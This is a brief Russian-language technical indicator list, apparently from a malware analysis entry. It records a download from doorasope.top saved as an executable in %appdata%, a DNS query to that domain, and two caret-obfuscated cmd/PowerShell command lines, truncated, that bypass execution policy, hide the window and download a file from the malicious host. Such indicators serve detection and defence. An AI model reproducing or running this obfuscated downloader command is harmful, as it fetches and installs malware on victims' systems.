Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^werShel^l^.e^xe -^ex^EC^U^tIO^n^POlicy BY^pAs^s^ ^-^no^Pr^oFIL^e^ ^-^WiN^dowSTY^Le Hid^De^N (n^eW-^obJE^ct S^YStEM^.ne^t.wE^bclie^n^t^)^.D^OWnLOadF^i^le('http://www.doora...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "po^werShel^l^.e^xe -^ex^EC^U^tIO^n^POlicy BY^pAs^s^ ^-^no^Pr^oFIL^e^ ^-^WiN^dowSTY^Le Hid^De^N (n^eW-^obJE^ct S^YStEM^.ne^t.wE^bclie^n^t^)^.D^OWnLOadF^i^le('http://www.doora...' (со скрытым окном)